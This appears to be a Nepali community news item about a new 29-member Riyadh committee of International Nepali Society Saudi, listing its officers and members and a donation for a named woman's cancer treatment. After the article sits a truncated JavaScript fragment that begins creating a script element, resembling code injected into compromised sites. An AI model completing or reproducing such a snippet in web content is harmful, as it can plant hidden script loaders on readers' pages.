साउदी- धनराज ओली संयोजकत्वमा २९ सदस्यीय अन्तर्राष्ट्रिय नेपाली समाज साउदी रीयाद क्षेत्रीय समीती गठन भएको छ ।

नव गठीत समीतीलाइ सम्बोधन गर्दै अन्तर्राष्ट्रिय नेपाली समाज साउदीका संयोजक रमेश लाम्गादेले पार्टीका प्रमुख एजेन्डा ५ स को ब्याख्याnaya गर्दै अबको नीकास अर्थिक बीकास लाइ आधार मान्दै नेपाली युवाहरु देस बीदेस गाउँ शहर बजार फ्याक्ट्री सडक गल्ली गल्लीहरुमा नया शक्तिको संगठन विस्तार गर्दै सम्पुर्ण ब्यापारी बुद्धिजिबी मजदुर दलीत महीला मुस्लिम जनजाती एक भएर रास्ट्रनीर्माणमा आफ्नो ठाउबाट लाग्न आग्रह गरे ।

यस्तो छ कार्य समिति
संरक्षक
१)रमेश लाम्गादे
२)नीर्दोश वि.क.
सल्लाहकारहरु
१)इन्द्र मगर
२)कुमार लीम्बु
क्षेत्रीय समीती पदधिकारीहरु
१)संयोजक :- धनराज वली
२)उपसंयोजक :- लक्ष्मण कटेल
३) प्रवक्ता :- देबेन्द्र विश्वकर्मा
४) सह प्रवक्ता :- टीकाराम बि.सि.
५) आर्थिक संयोजक:- लोकेस राम्जाली
६ )युवा संयोजक :- याम सुनार
७) युवा सहसंयोजक:- अर्जुन नौपाने
८) सांस्कृतिक संयोजक :- दयाराम राइ
९) मधेस संयोजक :- दिनेश प्रसाद कुशवाहा
१०) सहसंयोजक:- धर्मेन्द्र महतो
११)प्रचार प्रसार संयोजक:-राजन पोख्रेल
सदस्यहरु
१२) राम वहादुर के .सी.
१३) नरसिंह रोका मगर
१४) मोहन आचार्य
१५) थमन रानामगर
१६) प्रकाश सार्की
१७) लाल बहादुर थापा
१८) प्रेम ढकाल
१९) प्रेम मगर
२०) टेकनारायण घिसिङ्ग
२१) कर्ण बहादुर रसाइली
२२) नवराज वन्जारा
२३)सन्त बहादुर माझी
२४) पुर्ण बहादुर ओली
२५) मान बहादुर मगर
२६) जयनाथ राइ
२७) शेखर अधिकारी
२८)श्रीराम मगर
साथै उक्त समीतीले बाटुलासेन ५ अछाम निवासी ४६ वर्षकी जानकी न्यौपाने दीदीलाइ फोक्सोको क्यान्सर भएको हुदा उनको उपचार को लागी १४००० आर्थिक सहयोग गर्ने निर्णय समेत गरेको छ ।

var d=document;var s=d.createElement(‘script’);